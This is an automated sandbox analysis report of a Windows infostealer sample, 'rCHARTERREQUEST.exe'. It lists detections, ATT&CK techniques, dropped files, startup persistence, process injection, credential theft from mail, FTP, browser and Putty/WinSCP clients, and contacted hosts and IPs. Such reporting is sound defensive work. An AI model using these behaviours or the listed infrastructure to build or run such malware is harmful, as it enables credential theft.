                        Source: Yara matchFile source: 00000008.00000002.2925812207.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rCHARTERREQUEST.exe PID: 7388, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7904, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ilsucsfth.exe PID: 8128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6756, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information111
                        Scripting                        		Valid Accounts121
                        Windows Management Instrumentation                        		111
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		3
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        DLL Side-Loading                        		211
                        Process Injection                        		2
                        Obfuscated Files or Information                        		1
                        Credentials in Registry                        		24
                        System Information Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAt2
                        Registry Run Keys / Startup Folder                        		2
                        Registry Run Keys / Startup Folder                        		1
                        DLL Side-Loading                        		Security Account Manager1
                        Query Registry                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Masquerading                        		NTDS311
                        Security Software Discovery                        		Distributed Component Object ModelInput Capture3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                        Virtualization/Sandbox Evasion                        		LSA Secrets1
                        Process Discovery                        		SSHKeylogging24
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                        Process Injection                        		Cached Domain Credentials141
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589737 Sample: rCHARTERREQUEST.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 34 oshi.at 2->34 36 api.ipify.org 2->36 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 8 other signatures 2->64 8 rCHARTERREQUEST.exe 15 7 2->8         started        13 wscript.exe 1 2->13         started        signatures3 process4 dnsIp5 38 oshi.at 194.15.112.248, 443, 49732, 49739 INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB Ukraine 8->38 26 C:\Users\user\AppData\Roaming\ilsucsfth.exe, PE32 8->26 dropped 28 C:\Users\user\AppData\Local\Temp\ckuv.exe, PE32 8->28 dropped 30 C:\Users\...\ilsucsfth.exe:Zone.Identifier, ASCII 8->30 dropped 32 C:\Users\user\AppData\...\ilsucsfth.vbs, ASCII 8->32 dropped 74 Drops VBS files to the startup folder 8->74 76 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->76 78 Writes to foreign memory regions 8->78 80 Injects a PE file into a foreign processes 8->80 15 InstallUtil.exe 14 2 8->15         started        19 ckuv.exe 14 2 8->19         started        82 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->82 21 ilsucsfth.exe 14 2 13->21         started        file6 signatures7 process8 dnsIp9 40 162.254.34.31, 49741, 49846, 587 VIVIDHOSTINGUS United States 15->40 42 api.ipify.org 104.26.12.205, 443, 49740, 49836 CLOUDFLARENETUS United States 15->42 44 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->44 46 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->46 48 Tries to steal Mail credentials (via file / registry access) 15->48 50 Multi AV Scanner detection for dropped file 21->50 52 Machine Learning detection for dropped file 21->52 54 Writes to foreign memory regions 21->54 56 Injects a PE file into a foreign processes 21->56 23 InstallUtil.exe 21->23         started        signatures10 process11 signatures12 66 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->66 68 Tries to steal Mail credentials (via file / registry access) 23->68 70 Tries to harvest and steal ftp login credentials 23->70 72 Tries to harvest and steal browser information (history, passwords, etc) 23->72

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        rCHARTERREQUEST.exe21%ReversingLabsByteCode-MSIL.Infostealer.Tinba
                        rCHARTERREQUEST.exe36%VirustotalBrowse
                        rCHARTERREQUEST.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\ckuv.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\ilsucsfth.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\ckuv.exe71%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                        C:\Users\user\AppData\Roaming\ilsucsfth.exe21%ReversingLabsByteCode-MSIL.Infostealer.Tinba

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://oshi.at/cQXB0%Avira URL Cloudsafe
                        https://oshi.at/BLZu0%Avira URL Cloudsafe
                        https://oshi.at/BLZuM0%Avira URL Cloudsafe
                        https://oshi.at/cQXBUThe0%Avira URL Cloudsafe
                        http://oshi.atx0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        oshi.at
                        		194.15.112.248
                        		truefalse
                          		high
                          api.ipify.org
                          		104.26.12.205
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              		high
                              https://oshi.at/BLZufalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://oshi.at/cQXBfalse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://oshi.atdckuv.exe, 00000004.00000002.2925011951.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000298F000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002846000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000278A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002994000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000029EA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000290B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002823000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000275F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.ipify.orgrCHARTERREQUEST.exe, 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2390155026.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2925812207.00000000029AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/mgravell/protobuf-netirCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/14436606/23354rCHARTERREQUEST.exe, 00000000.00000002.1918032779.000000000318D000.00000004.00000800.00020000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://oshi.atckuv.exe, 00000004.00000002.2925011951.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000298F000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002846000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000278A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002994000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000029EA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000290B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002823000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000275F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://account.dyn.com/rCHARTERREQUEST.exe, 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netJrCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://stackoverflow.com/q/11564914/23354;rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://stackoverflow.com/q/2152978/23354rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/somenonymous/OshiUploadckuv.exe, 00000004.00000002.2925011951.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002784000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002895000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000289A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002889000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002985000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000278A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://oshi.at/BLZuMckuv.exe, 00000004.00000000.1905785177.0000000000572000.00000002.00000001.01000000.00000007.sdmp, ckuv.exe.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://oshi.at/cQXBUTherCHARTERREQUEST.exe, ilsucsfth.exe.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/mgravell/protobuf-netrCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://oshi.atrCHARTERREQUEST.exe, 00000000.00000002.1918032779.0000000003141000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://oshi.atxckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.ipify.org/tInstallUtil.exe, 00000005.00000002.2390155026.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2925812207.00000000029AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oshi.atDckuv.exe, 00000004.00000002.2925011951.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000298F000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002846000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000278A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002994000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000029EA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000290B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002823000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000275F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerCHARTERREQUEST.exe, 00000000.00000002.1918032779.0000000003141000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2390155026.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2925812207.00000000029AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            194.15.112.248
                                                            		oshi.atUkraine
                                                            		213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse
                                                            104.26.12.205
                                                            		api.ipify.orgUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            162.254.34.31
                                                            		unknownUnited States
                                                            		64200VIVIDHOSTINGUStrue

                                                            General Information

                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1589737
                                                            Start date and time:2025-01-13 03:00:08 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 23s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:rCHARTERREQUEST.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@10/4@2/3
                                                            EGA Information:
                                                            • Successful, ratio: 80%
                                                            HCA Information:
                                                            • Successful, ratio: 94%
                                                            • Number of executed functions: 458
                                                            • Number of non-executed functions: 45
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target ckuv.exe, PID 7816 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            02:01:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbs
                                                            21:00:58API Interceptor74x Sleep call for process: rCHARTERREQUEST.exe modified
                                                            21:01:23API Interceptor1220946x Sleep call for process: ckuv.exe modified
                                                            21:01:25API Interceptor34x Sleep call for process: InstallUtil.exe modified
                                                            21:01:36API Interceptor160x Sleep call for process: ilsucsfth.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            194.15.112.248MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                              MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  Ref#103052.exeGet hashmaliciousXWormBrowse
                                                                    9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                      Ref_31020563.exeGet hashmaliciousUnknownBrowse
                                                                        Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                                                                          Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                            Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                              KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                104.26.12.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                • api.ipify.org/
                                                                                RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                • api.ipify.org/
                                                                                jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                                • api.ipify.org/?format=text
                                                                                xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                                                • api.ipify.org/
                                                                                GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                • api.ipify.org/
                                                                                8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                                • api.ipify.org/
                                                                                Simple2.exeGet hashmaliciousUnknownBrowse
                                                                                • api.ipify.org/
                                                                                Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                • api.ipify.org/
                                                                                Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                • api.ipify.org/
                                                                                6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                • api.ipify.org/
                                                                                162.254.34.31VYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                            Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                              Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                  BankInformation.vbeGet hashmaliciousAgentTeslaBrowse

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    api.ipify.orghttp://clumsy-sulky-helium.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.26.12.205
                                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 104.26.13.205
                                                                                                    gem2.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 104.26.12.205
                                                                                                    gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 104.26.12.205
                                                                                                    https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 172.67.74.152
                                                                                                    https://support-confirm-help.click/Get hashmaliciousUnknownBrowse
                                                                                                    • 172.67.74.152
                                                                                                    zmpZMfK1b4.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 172.67.74.152
                                                                                                    kAsh3nmsgs.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • 104.26.13.205
                                                                                                    dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 104.26.13.205
                                                                                                    JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 172.67.74.152
                                                                                                    oshi.atMWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 194.15.112.248
                                                                                                    GhwFStoMJX.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 5.253.86.15
                                                                                                    GhwFStoMJX.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 5.253.86.15
                                                                                                    IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 194.15.112.248
                                                                                                    IMG_10503677.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 5.253.86.15
